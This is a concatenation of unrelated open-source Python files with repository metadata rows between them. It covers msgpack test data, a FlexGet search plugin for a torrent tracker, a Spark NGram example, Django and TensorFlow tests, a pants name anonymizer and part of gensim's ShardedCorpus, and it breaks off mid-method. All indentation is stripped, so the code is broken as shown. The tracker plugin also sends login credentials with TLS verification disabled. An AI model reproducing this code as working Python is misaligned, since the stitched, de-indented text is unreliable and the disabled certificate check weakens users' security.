{ "true": u"True",
"false": False,
"uint16(1616)": 1616 },
{ "list": [1616, 32323232, True, -3232.0, {"TRUE":True, "FALSE":False}, [True, False] ],
"int32":32323232, "bool": True,
"LONG STRING": u"123456789012345678901234567890123456789012345678901234567890",
"SHORT STRING": u"1234567890" },
{ True: "true", 138: False, "false": 200 }
]
l = []
l.extend(l0)
l.append(l0)
l.append(1)
l.extend(l1)
return l
def build_test_data(destdir):
l = get_test_data_list()
for i in range(len(l)):
# packer = msgpack.Packer()
serialized = msgpack.dumps(l[i])
f = open(os.path.join(destdir, str(i) + '.msgpack.golden'), 'wb')
f.write(serialized)
f.close()
serialized = cbor.dumps(l[i])
f = open(os.path.join(destdir, str(i) + '.cbor.golden'), 'wb')
f.write(serialized)
f.close()
def doRpcServer(port, stopTimeSec):
class EchoHandler(object):
def Echo123(self, msg1, msg2, msg3):
return ("1:%s 2:%s 3:%s" % (msg1, msg2, msg3))
def EchoStruct(self, msg):
return ("%s" % msg)
addr = msgpackrpc.Address('localhost', port)
server = msgpackrpc.Server(EchoHandler())
server.listen(addr)
# run thread to stop it after stopTimeSec seconds if > 0
if stopTimeSec > 0:
def myStopRpcServer():
server.stop()
t = threading.Timer(stopTimeSec, myStopRpcServer)
t.start()
server.start()
def doRpcClientToPythonSvc(port):
address = msgpackrpc.Address('localhost', port)
client = msgpackrpc.Client(address, unpack_encoding='utf-8')
print client.call("Echo123", "A1", "B2", "C3")
print client.call("EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doRpcClientToGoSvc(port):
# print ">>>> port: ", port, " <<<<<"
address = msgpackrpc.Address('localhost', port)
client = msgpackrpc.Client(address, unpack_encoding='utf-8')
print client.call("TestRpcInt.Echo123", ["A1", "B2", "C3"])
print client.call("TestRpcInt.EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doMain(args):
if len(args) == 2 and args[0] == "testdata":
build_test_data(args[1])
elif len(args) == 3 and args[0] == "rpc-server":
doRpcServer(int(args[1]), int(args[2]))
elif len(args) == 2 and args[0] == "rpc-client-python-service":
doRpcClientToPythonSvc(int(args[1]))
elif len(args) == 2 and args[0] == "rpc-client-go-service":
doRpcClientToGoSvc(int(args[1]))
else:
print("Usage: test.py " +
"[testdata|rpc-server|rpc-client-python-service|rpc-client-go-service] ...")
if __name__ == "__main__":
doMain(sys.argv[1:])
| apache-2.0 | -6,868,696,857,130,023,000 | 30.97619 | 96 | 0.569868 | false |
BrainDamage/Flexget | flexget/plugins/search_ptn.py | 4 | 4667 | from __future__ import unicode_literals, division, absolute_import
import logging
from requests.auth import AuthBase
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.utils import requests
from flexget.utils.imdb import extract_id
from flexget.utils.soup import get_soup
from flexget.utils.search import torrent_availability
log = logging.getLogger('search_ptn')
class CookieAuth(AuthBase):
def __init__(self, cookies):
self.cookies = cookies
def __call__(self, r):
r.prepare_cookies(self.cookies)
return r
categories = {
'1080p': 'c5',
'720p': 'c6',
'bdrip': 'c10',
'bluray': 'c1',
'brrip': 'c11',
'dvdr': 'c4',
'dvdrip': 'c12',
'mp4': 'c16',
'ost/flac': 'c17',
'ost/mp3': 'c18',
'packs': 'c20',
'r5/scr': 'c13',
'remux': 'c2',
'tvrip': 'c15',
'webrip': 'c14'
}
class SearchPTN(object):
schema = {
'type': 'object',
'properties': {
'username': {'type': 'string'},
'login_key': {'type': 'string'},
'password': {'type': 'string'},
'categories': {
'type': 'array',
'items': {'type': 'string', 'enum': list(categories)}
}
},
'required': ['username', 'login_key', 'password'],
'additionalProperties': False
}
def search(self, entry, config):
login_sess = requests.Session()
login_params = {'username': config['username'],
'password': config['password'],
'loginkey': config['login_key']}
try:
login_sess.post('https://piratethenet.org/takelogin.php', data=login_params, verify=False)
except requests.RequestException as e:
log.error('Error while logging in to PtN: %s', e)
download_auth = CookieAuth(login_sess.cookies)
# Default to searching by title (0=title 3=imdb_id)
search_by = 0
if 'imdb_id' in entry:
searches = [entry['imdb_id']]
search_by = 3
elif 'movie_name' in entry:
search = entry['movie_name']
if 'movie_year' in entry:
search += ' %s' % entry['movie_year']
searches = [search]
else:
searches = entry.get('search_strings', [entry['title']])
params = {'_by': search_by}
if config.get('categories'):
for cat in config['categories']:
params[categories[cat]] = 1
results = set()
for search in searches:
params['search'] = search
try:
r = login_sess.get('http://piratethenet.org/browse.php', params=params)
except requests.RequestException as e:
log.error('Error searching ptn: %s' % e)
continue
soup = get_soup(r.text)
if 'login' in soup.head.title.text.lower():
log.error('PtN cookie info invalid')
raise plugin.PluginError('PTN cookie info invalid')
try:
results_table = soup.find_all('table', attrs={'class': 'main'}, limit=2)[1]
except IndexError:
log.debug('no results found for `%s`' % search)
continue
for row in results_table.find_all('tr')[1:]:
columns = row.find_all('td')
entry = Entry()
links = columns[1].find_all('a', recursive=False, limit=2)
entry['title'] = links[0].text
if len(links) > 1:
entry['imdb_id'] = extract_id(links[1].get('href'))
entry['url'] = 'http://piratethenet.org/' + columns[2].a.get('href')
entry['download_auth'] = download_auth
entry['torrent_seeds'] = int(columns[8].text)
entry['torrent_leeches'] = int(columns[9].text)
entry['search_sort'] = torrent_availability(entry['torrent_seeds'], entry['torrent_leeches'])
size = columns[6].find('br').previous_sibling
unit = columns[6].find('br').next_sibling
if unit == 'GB':
entry['content_size'] = int(float(size) * 1024)
elif unit == 'MB':
entry['content_size'] = int(float(size))
elif unit == 'KB':
entry['content_size'] = int(float(size) / 1024)
results.add(entry)
return results
@event('plugin.register')
def register_plugin():
plugin.register(SearchPTN, 'ptn', groups=['search'], api_ver=2)
| mit | 6,010,418,141,242,508,000 | 34.356061 | 109 | 0.526248 | false |
map222/spark | examples/src/main/python/ml/n_gram_example.py | 123 | 1545 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
# $example on$
from pyspark.ml.feature import NGram
# $example off$
from pyspark.sql import SparkSession
if __name__ == "__main__":
spark = SparkSession\
.builder\
.appName("NGramExample")\
.getOrCreate()
# $example on$
wordDataFrame = spark.createDataFrame([
(0, ["Hi", "I", "heard", "about", "Spark"]),
(1, ["I", "wish", "Java", "could", "use", "case", "classes"]),
(2, ["Logistic", "regression", "models", "are", "neat"])
], ["id", "words"])
ngram = NGram(n=2, inputCol="words", outputCol="ngrams")
ngramDataFrame = ngram.transform(wordDataFrame)
ngramDataFrame.select("ngrams").show(truncate=False)
# $example off$
spark.stop()
| apache-2.0 | 796,762,692,266,558,700 | 34.113636 | 74 | 0.682201 | false |
t0in4/django | tests/check_framework/test_multi_db.py | 191 | 1682 | from django.db import connections, models
from django.test import TestCase, mock
from django.test.utils import override_settings
from .tests import IsolateModelsMixin
class TestRouter(object):
"""
Routes to the 'other' database if the model name starts with 'Other'.
"""
def allow_migrate(self, db, app_label, model=None, **hints):
return db == ('other' if model._meta.verbose_name.startswith('other') else 'default')
@override_settings(DATABASE_ROUTERS=[TestRouter()])
class TestMultiDBChecks(IsolateModelsMixin, TestCase):
multi_db = True
def _patch_check_field_on(self, db):
return mock.patch.object(connections[db].validation, 'check_field')
def test_checks_called_on_the_default_database(self):
class Model(models.Model):
field = models.CharField(max_length=100)
model = Model()
with self._patch_check_field_on('default') as mock_check_field_default:
with self._patch_check_field_on('other') as mock_check_field_other:
model.check()
self.assertTrue(mock_check_field_default.called)
self.assertFalse(mock_check_field_other.called)
def test_checks_called_on_the_other_database(self):
class OtherModel(models.Model):
field = models.CharField(max_length=100)
model = OtherModel()
with self._patch_check_field_on('other') as mock_check_field_other:
with self._patch_check_field_on('default') as mock_check_field_default:
model.check()
self.assertTrue(mock_check_field_other.called)
self.assertFalse(mock_check_field_default.called)
| bsd-3-clause | 215,806,418,526,590,750 | 38.116279 | 93 | 0.661712 | false |
Ervii/garage-time | garage/src/python/pants/backend/jvm/tasks/jvm_compile/anonymizer.py | 2 | 4846 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
import base64
import os
import random
import re
_default_keep_words = [
'AAAAAAAAAAA=',
'analysis',
'anonfun',
'apply',
'beta',
'class',
'classes',
'com',
'd',
'home',
'jar',
'jars',
'java',
'javac',
'jvm',
'lib',
'library',
'pants',
'rt',
'scala',
'scalac',
'src',
'unapply',
'users',
'web'
]
_default_word_map = {
'foursquare': 'acme',
'benjy': 'kermit'
}
# TODO: Move somewhere more general? Could also be used to anonymize source files.
class Anonymizer(object):
"""Anonymizes names in analysis files.
Will replace all words in word_map with the corresponding value.
Will replace all other words with a random word from word_list, except for
words in keep.
Replacements are 1:1, and therefore invertible.
Useful for obfuscating real-life analysis files so we can use them in tests without
leaking proprietary information.
"""
# Utility method for anonymizing base64-encoded binary data in analysis files.
@staticmethod
def _random_base64_string():
n = random.randint(20, 200)
return base64.b64encode(os.urandom(n))
# Break on delimiters (digits, space, forward slash, dash, underscore, dollar, period) and on
# upper-case letters.
_DELIMITER = r'\d|\s|/|-|_|\$|\.'
_UPPER = r'[A-Z]'
_UPPER_CASE_RE = re.compile(r'^%s$' % _UPPER)
_DELIMITER_RE = re.compile(r'^%s$' % _DELIMITER)
_BREAK_ON_RE = re.compile(r'(%s|%s)' % (_DELIMITER, _UPPER)) # Capture what we broke on.
# Valid replacement words must be all lower-case letters, with no apostrophes etc.
_WORD_RE = re.compile(r'^[a-z]+$')
def __init__(self, word_list, word_map=None, keep=None, strict=False):
self._translations = {}
self._reverse_translations = {}
# Init from args.
for k, v in (_default_word_map if word_map is None else word_map).items():
self._add_translation(k, v)
for w in _default_keep_words if keep is None else keep:
self._add_translation(w, w)
# Prepare list of candidate translations.
self._unused_words = list(
set(filter(Anonymizer._WORD_RE.match, word_list)) -
set(self._translations.values()) -
set(self._translations.keys()))
random.shuffle(self._unused_words)
self._strict = strict
# If we're not strict and we run out of replacement words, we count how many more words
# we need, so we can give a useful error message to that effect.
self._words_needed = 0
def words_needed(self):
return self._words_needed
def check_for_comprehensiveness(self):
if self._words_needed:
raise Exception('Need %d more words in word_list for full anonymization.' % self._words_needed)
def convert(self, s):
parts = Anonymizer._BREAK_ON_RE.split(s)
parts_iter = iter(parts)
converted_parts = []
for part in parts_iter:
if part == '' or Anonymizer._DELIMITER_RE.match(part):
converted_parts.append(part)
elif Anonymizer._UPPER_CASE_RE.match(part):
# Join to the rest of the word, if any.
token = part
try:
token += parts_iter.next()
except StopIteration:
pass
converted_parts.append(self._convert_single_token(token))
else:
converted_parts.append(self._convert_single_token(part))
return ''.join(converted_parts)
def convert_base64_string(self, s):
translation = self._translations.get(s)
if translation is None:
translation = Anonymizer._random_base64_string()
self._add_translation(s, translation)
return translation
def _convert_single_token(self, token):
lower = token.lower()
translation = self._translations.get(lower)
if translation is None:
if not self._unused_words:
if self._strict:
raise Exception('Ran out of words to translate to.')
else:
self._words_needed += 1
translation = lower
else:
translation = self._unused_words.pop()
self._add_translation(lower, translation)
# Use the same capitalization as the original word.
if token[0].isupper():
return translation.capitalize()
else:
return translation
def _add_translation(self, frm, to):
if frm in self._translations:
raise Exception('Word already has translation: %s -> %s' % (frm, self._translations[frm]))
if to in self._reverse_translations:
raise Exception('Translation target already used: %s -> %s' % (self._reverse_translations[to], to))
self._translations[frm] = to
self._reverse_translations[to] = frm
| apache-2.0 | -914,592,778,820,087,900 | 28.91358 | 105 | 0.652084 | false |
brendandburns/tensorflow | tensorflow/python/training/queue_runner_test.py | 5 | 6725 | """Tests for QueueRunner."""
import time
import tensorflow.python.platform
import tensorflow as tf
class QueueRunnerTest(tf.test.TestCase):
def testBasic(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.initialize_all_variables().run()
qr = tf.train.QueueRunner(queue, [count_up_to])
threads = qr.create_threads(sess)
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 3.
self.assertEqual(3, var.eval())
def testTwoOps(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var0 = tf.Variable(zero64)
count_up_to_3 = var0.count_up_to(3)
var1 = tf.Variable(zero64)
count_up_to_30 = var1.count_up_to(30)
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, [count_up_to_3, count_up_to_30])
threads = qr.create_threads(sess)
tf.initialize_all_variables().run()
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
self.assertEqual(3, var0.eval())
self.assertEqual(30, var1.eval())
def testExceptionsCaptured(self):
with self.test_session() as sess:
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, ["i fail", "so fail"])
threads = qr.create_threads(sess)
tf.initialize_all_variables().run()
for t in threads:
t.start()
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(2, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
self.assertTrue("Operation not in the graph" in str(exceptions[1]))
def testRealDequeueEnqueue(self):
with self.test_session() as sess:
q0 = tf.FIFOQueue(3, tf.float32)
enqueue0 = q0.enqueue((10.0,))
close0 = q0.close()
q1 = tf.FIFOQueue(30, tf.float32)
enqueue1 = q1.enqueue((q0.dequeue(),))
dequeue1 = q1.dequeue()
qr = tf.train.QueueRunner(q1, [enqueue1])
threads = qr.create_threads(sess)
for t in threads:
t.start()
# Enqueue 2 values, then close queue0.
enqueue0.run()
enqueue0.run()
close0.run()
# Wait for the queue runner to terminate.
for t in threads:
t.join()
# It should have terminated cleanly.
self.assertEqual(0, len(qr.exceptions_raised))
# The 2 values should be in queue1.
self.assertEqual(10.0, dequeue1.eval())
self.assertEqual(10.0, dequeue1.eval())
# And queue1 should now be closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError, "is closed"):
dequeue1.eval()
def testRespectCoordShouldStop(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.initialize_all_variables().run()
qr = tf.train.QueueRunner(queue, [count_up_to])
# As the coordinator to stop. The queue runner should
# finish immediately.
coord = tf.train.Coordinator()
coord.request_stop()
threads = qr.create_threads(sess, coord)
for t in threads:
t.start()
coord.join(threads)
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 0.
self.assertEqual(0, var.eval())
def testRequestStopOnException(self):
with self.test_session() as sess:
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, ["not an op"])
coord = tf.train.Coordinator()
threads = qr.create_threads(sess, coord)
for t in threads:
t.start()
# The exception should be re-raised when joining.
with self.assertRaisesRegexp(ValueError, "Operation not in the graph"):
coord.join(threads)
def testGracePeriod(self):
with self.test_session() as sess:
# The enqueue will quickly block.
queue = tf.FIFOQueue(2, tf.float32)
enqueue = queue.enqueue((10.0,))
dequeue = queue.dequeue()
qr = tf.train.QueueRunner(queue, [enqueue])
coord = tf.train.Coordinator()
threads = qr.create_threads(sess, coord, start=True)
# Dequeue one element and then request stop.
dequeue.op.run()
time.sleep(0.02)
coord.request_stop()
# We should be able to join because the RequestStop() will cause
# the queue to be closed and the enqueue to terminate.
coord.join(threads, stop_grace_period_secs=0.05)
def testNoMultiThreads(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.initialize_all_variables().run()
coord = tf.train.Coordinator()
qr = tf.train.QueueRunner(queue, [count_up_to])
threads = []
threads.extend(qr.create_threads(sess, coord=coord))
with self.assertRaisesRegexp(
RuntimeError,
"Threads are already running"):
threads.extend(qr.create_threads(sess, coord=coord))
coord.request_stop()
coord.join(threads, stop_grace_period_secs=0.5)
def testThreads(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.initialize_all_variables().run()
qr = tf.train.QueueRunner(queue, [count_up_to, "bad op"])
threads = qr.create_threads(sess, start=True)
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(1, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
threads = qr.create_threads(sess, start=True)
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(1, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | -1,303,419,447,974,835,700 | 35.155914 | 77 | 0.635985 | false |
sebastien-j/gensim | gensim/corpora/sharded_corpus.py | 63 | 35097 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Original author: Jan Hajic jr.
# Copyright (C) 2015 Radim Rehurek and gensim team.
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
This module implements a corpus class that stores its data in separate files called
"shards". This is a compromise between speed (keeping the whole dataset
in memory) and memory footprint (keeping the data on disk and reading from it
on demand).
The corpus is intended for situations where you need to use your data
as numpy arrays for some iterative processing (like training something
using SGD, which usually involves heavy matrix multiplication).
"""
from __future__ import print_function
import logging
import os
import math
import numpy
import scipy.sparse as sparse
import time
logger = logging.getLogger(__name__)
#: Specifies which dtype should be used for serializing the shards.
_default_dtype = float
try:
import theano
_default_dtype = theano.config.floatX
except ImportError:
logger.info('Could not import Theano, will use standard float for default ShardedCorpus dtype.')
from six.moves import xrange
import gensim
from gensim.corpora import IndexedCorpus
from gensim.interfaces import TransformedCorpus
class ShardedCorpus(IndexedCorpus):
"""
This corpus is designed for situations where you need to train a model
on matrices, with a large number of iterations. (It should be faster than
gensim's other IndexedCorpus implementations for this use case; check the
`benchmark_datasets.py` script. It should also serialize faster.)
The corpus stores its data in separate files called
"shards". This is a compromise between speed (keeping the whole dataset
in memory) and memory footprint (keeping the data on disk and reading from
it on demand). Persistence is done using the standard gensim load/save methods.
.. note::
The dataset is **read-only**, there is - as opposed to gensim's Similarity
class, which works similarly - no way of adding documents to the dataset
(for now).
You can use ShardedCorpus to serialize your data just like any other gensim
corpus that implements serialization. However, because the data is saved
as numpy 2-dimensional ndarrays (or scipy sparse matrices), you need to
supply the dimension of your data to the corpus. (The dimension of word
frequency vectors will typically be the size of the vocabulary, etc.)
>>> corpus = gensim.utils.mock_data()
>>> output_prefix = 'mydata.shdat'
>>> ShardedCorpus.serialize(output_prefix, corpus, dim=1000)
The `output_prefix` tells the ShardedCorpus where to put the data.
Shards are saved as `output_prefix.0`, `output_prefix.1`, etc.
All shards must be of the same size. The shards can be re-sized (which
is essentially a re-serialization into new-size shards), but note that
this operation will temporarily take twice as much disk space, because
the old shards are not deleted until the new shards are safely in place.
After serializing the data, the corpus will then save itself to the file
`output_prefix`.
On further initialization with the same `output_prefix`, the corpus
will load the already built dataset unless the `overwrite` option is
given. (A new object is "cloned" from the one saved to `output_prefix`
previously.)
To retrieve data, you can load the corpus and use it like a list:
>>> sh_corpus = ShardedCorpus.load(output_prefix)
>>> batch = sh_corpus[100:150]
This will retrieve a numpy 2-dimensional array of 50 rows and 1000
columns (1000 was the dimension of the data we supplied to the corpus).
To retrieve gensim-style sparse vectors, set the `gensim` property:
>>> sh_corpus.gensim = True
>>> batch = sh_corpus[100:150]
The batch now will be a generator of gensim vectors.
Since the corpus needs the data serialized in order to be able to operate,
it will serialize data right away on initialization. Instead of calling
`ShardedCorpus.serialize()`, you can just initialize and use the corpus
right away:
>>> corpus = ShardedCorpus(output_prefix, corpus, dim=1000)
>>> batch = corpus[100:150]
ShardedCorpus also supports working with scipy sparse matrices, both
during retrieval and during serialization. If you want to serialize your
data as sparse matrices, set the `sparse_serialization` flag. For
retrieving your data as sparse matrices, use the `sparse_retrieval`
flag. (You can also retrieve densely serialized data as sparse matrices,
for the sake of completeness, and vice versa.) By default, the corpus
will retrieve numpy ndarrays even if it was serialized into sparse
matrices.
>>> sparse_prefix = 'mydata.sparse.shdat'
>>> ShardedCorpus.serialize(sparse_prefix, corpus, dim=1000, sparse_serialization=True)
>>> sparse_corpus = ShardedCorpus.load(sparse_prefix)
>>> batch = sparse_corpus[100:150]
>>> type(batch)
<type 'numpy.ndarray'>
>>> sparse_corpus.sparse_retrieval = True
>>> batch = sparse_corpus[100:150]
<class 'scipy.sparse.csr.csr_matrix'>
While you *can* touch the `sparse_retrieval` attribute during the life
of a ShardedCorpus object, you should definitely not touch `
`sharded_serialization`! Changing the attribute will not miraculously
re-serialize the data in the requested format.
The CSR format is used for sparse data throughout.
Internally, to retrieve data, the dataset keeps track of which shard is
currently open and on a `__getitem__` request, either returns an item from
the current shard, or opens a new one. The shard size is constant, except
for the last shard.
"""
def __init__(self, output_prefix, corpus, dim=None,
shardsize=4096, overwrite=False, sparse_serialization=False,
sparse_retrieval=False, gensim=False):
"""Initializes the dataset. If `output_prefix` is not found,
builds the shards.
:type output_prefix: str
:param output_prefix: The absolute path to the file from which shard
filenames should be derived. The individual shards will be saved
as `output_prefix.0`, `output_prefix.1`, etc.
The `output_prefix` path then works as the filename to which
the ShardedCorpus object itself will be automatically saved.
Normally, gensim corpora do not do this, but ShardedCorpus needs
to remember several serialization settings: namely the shard
size and whether it was serialized in dense or sparse format. By
saving automatically, any new ShardedCorpus with the same
`output_prefix` will be able to find the information about the
data serialized with the given prefix.
If you want to *overwrite* your data serialized with some output
prefix, set the `overwrite` flag to True.
Of course, you can save your corpus separately as well using
the `save()` method.
:type corpus: gensim.interfaces.CorpusABC
:param corpus: The source corpus from which to build the dataset.
:type dim: int
:param dim: Specify beforehand what the dimension of a dataset item
should be. This is useful when initializing from a corpus that
doesn't advertise its dimension, or when it does and you want to
check that the corpus matches the expected dimension. **If `dim`
is left unused and `corpus` does not provide its dimension in
an expected manner, initialization will fail.**
:type shardsize: int
:param shardsize: How many data points should be in one shard. More
data per shard means less shard reloading but higher memory usage
and vice versa.
:type overwrite: bool
:param overwrite: If set, will build dataset from given corpus even
if `output_prefix` already exists.
:type sparse_serialization: bool
:param sparse_serialization: If set, will save the data in a sparse
form (as csr matrices). This is to speed up retrieval when you
know you will be using sparse matrices.
..note::
This property **should not change** during the lifetime of
the dataset. (If you find out you need to change from a sparse
to a dense representation, the best practice is to create
another ShardedCorpus object.)
:type sparse_retrieval: bool
:param sparse_retrieval: If set, will retrieve data as sparse vectors
(numpy csr matrices). If unset, will return ndarrays.
Note that retrieval speed for this option depends on how the dataset
was serialized. If `sparse_serialization` was set, then setting
`sparse_retrieval` will be faster. However, if the two settings
do not correspond, the conversion on the fly will slow the dataset
down.
:type gensim: bool
:param gensim: If set, will convert the output to gensim
sparse vectors (list of tuples (id, value)) to make it behave like
any other gensim corpus. This **will** slow the dataset down.
"""
self.output_prefix = output_prefix
self.shardsize = shardsize
self.n_docs = 0
self.offsets = []
self.n_shards = 0
self.dim = dim # This number may change during initialization/loading.
# Sparse vs. dense serialization and retrieval.
self.sparse_serialization = sparse_serialization
self.sparse_retrieval = sparse_retrieval
self.gensim = gensim
# The "state" of the dataset.
self.current_shard = None # The current shard itself (numpy ndarray)
self.current_shard_n = None # Current shard is the current_shard_n-th
self.current_offset = None # The index into the dataset which
# corresponds to index 0 of current shard
logger.info('Initializing sharded corpus with prefix '
'{0}'.format(output_prefix))
if (not os.path.isfile(output_prefix)) or overwrite:
logger.info('Building from corpus...')
self.init_shards(output_prefix, corpus, shardsize)
# Save automatically, to facilitate re-loading
# and retain information about how the corpus
# was serialized.
logger.info('Saving ShardedCorpus object to '
'{0}'.format(self.output_prefix))
self.save()
else:
logger.info('Cloning existing...')
self.init_by_clone()
def init_shards(self, output_prefix, corpus, shardsize=4096, dtype=_default_dtype):
"""Initialize shards from the corpus."""
if not gensim.utils.is_corpus(corpus):
raise ValueError('Cannot initialize shards without a corpus to read'
' from! (Got corpus type: {0})'.format(type(corpus)))
proposed_dim = self._guess_n_features(corpus)
if proposed_dim != self.dim:
if self.dim is None:
logger.info('Deriving dataset dimension from corpus: '
'{0}'.format(proposed_dim))
else:
logger.warn('Dataset dimension derived from input corpus diffe'
'rs from initialization argument, using corpus.'
'(corpus {0}, init arg {1})'.format(proposed_dim,
self.dim))
self.dim = proposed_dim
self.offsets = [0]
start_time = time.clock()
logger.info('Running init from corpus.')
for n, doc_chunk in enumerate(gensim.utils.grouper(corpus, chunksize=shardsize)):
logger.info('Chunk no. {0} at {1} s'.format(n, time.clock() - start_time))
current_shard = numpy.zeros((len(doc_chunk), self.dim), dtype=dtype)
logger.debug('Current chunk dimension: '
'{0} x {1}'.format(len(doc_chunk), self.dim))
for i, doc in enumerate(doc_chunk):
doc = dict(doc)
current_shard[i][list(doc)] = list(gensim.matutils.itervalues(doc))
# Handles the updating as well.
if self.sparse_serialization:
current_shard = sparse.csr_matrix(current_shard)
self.save_shard(current_shard)
end_time = time.clock()
logger.info('Built {0} shards in {1} s.'.format(self.n_shards, end_time - start_time))
def init_by_clone(self):
"""
Initialize by copying over attributes of another ShardedCorpus
instance saved to the output_prefix given at __init__().
"""
temp = self.__class__.load(self.output_prefix)
self.n_shards = temp.n_shards
self.n_docs = temp.n_docs
self.offsets = temp.offsets
if temp.dim != self.dim:
if self.dim is None:
logger.info('Loaded dataset dimension: {0}'.format(temp.dim))
else:
logger.warn('Loaded dataset dimension differs from init arg '
'dimension, using loaded dim. '
'(loaded {0}, init {1})'.format(temp.dim, self.dim))
self.dim = temp.dim # To be consistent with the loaded data!
def save_shard(self, shard, n=None, filename=None):
"""
Pickle the given shard. If `n` is not given, will consider the shard
a new one.
If `filename` is given, will use that file name instead of generating
one.
"""
new_shard = False
if n is None:
n = self.n_shards # Saving the *next* one by default.
new_shard = True
if not filename:
filename = self._shard_name(n)
gensim.utils.pickle(shard, filename)
if new_shard:
self.offsets.append(self.offsets[-1] + shard.shape[0])
self.n_docs += shard.shape[0]
self.n_shards += 1
def load_shard(self, n):
"""
Load (unpickle) the n-th shard as the "live" part of the dataset
into the Dataset object."""
#logger.debug('ShardedCorpus loading shard {0}, '
# 'current shard: {1}'.format(n, self.current_shard_n))
# No-op if the shard is already open.
if self.current_shard_n == n:
return
filename = self._shard_name(n)
if not os.path.isfile(filename):
raise ValueError('Attempting to load nonexistent shard no. {0}'.format(n))
shard = gensim.utils.unpickle(filename)
self.current_shard = shard
self.current_shard_n = n
self.current_offset = self.offsets[n]
def reset(self):
"""
Reset to no shard at all. Used for saving.
"""
self.current_shard = None
self.current_shard_n = None
self.current_offset = None
def shard_by_offset(self, offset):
"""
Determine which shard the given offset belongs to. If the offset
is greater than the number of available documents, raises a
`ValueError`.
Assumes that all shards have the same size.
"""
k = int(offset / self.shardsize)
if offset >= self.n_docs:
raise ValueError('Too high offset specified ({0}), available '
'docs: {1}'.format(offset, self.n_docs))
if offset < 0:
raise ValueError('Negative offset {0} currently not'
' supported.'.format(offset))
return k
k = -1
for i, o in enumerate(self.offsets):
if o > offset: # Condition should fire for every valid offset,
# since the last offset is n_docs (one-past-end).
k = i - 1 # First offset is always 0, so i is at least 1.
break
return k
def in_current(self, offset):
"""
Determine whether the given offset falls within the current shard.
"""
return (self.current_offset <= offset) \
and (offset < self.offsets[self.current_shard_n + 1])
def in_next(self, offset):
"""
Determine whether the given offset falls within the next shard.
This is a very small speedup: typically, we will be iterating through
the data forward. Could save considerable time with a very large number
of smaller shards.
"""
if self.current_shard_n == self.n_shards:
return False # There's no next shard.
return (self.offsets[self.current_shard_n + 1] <= offset) \
and (offset < self.offsets[self.current_shard_n + 2])
def resize_shards(self, shardsize):
"""
Re-process the dataset to new shard size. This may take pretty long.
Also, note that you need some space on disk for this one (we're
assuming there is enough disk space for double the size of the dataset
and that there is enough memory for old + new shardsize).
:type shardsize: int
:param shardsize: The new shard size.
"""
# Determine how many new shards there will be
n_new_shards = int(math.floor(self.n_docs / float(shardsize)))
if self.n_docs % shardsize != 0:
n_new_shards += 1
new_shard_names = []
new_offsets = [0]
for new_shard_idx in xrange(n_new_shards):
new_start = shardsize * new_shard_idx
new_stop = new_start + shardsize
# Last shard?
if new_stop > self.n_docs:
# Sanity check
assert new_shard_idx == n_new_shards - 1, \
'Shard no. {0} that ends at {1} over last document' \
' ({2}) is not the last projected shard ({3})???' \
''.format(new_shard_idx, new_stop, self.n_docs, n_new_shards)
new_stop = self.n_docs
new_shard = self[new_start:new_stop]
new_shard_name = self._resized_shard_name(new_shard_idx)
new_shard_names.append(new_shard_name)
try:
self.save_shard(new_shard, new_shard_idx, new_shard_name)
except Exception:
# Clean up on unsuccessful resize.
for new_shard_name in new_shard_names:
os.remove(new_shard_name)
raise
new_offsets.append(new_stop)
# Move old shard files out, new ones in. Complicated due to possibility
# of exceptions.
old_shard_names = [self._shard_name(n) for n in xrange(self.n_shards)]
try:
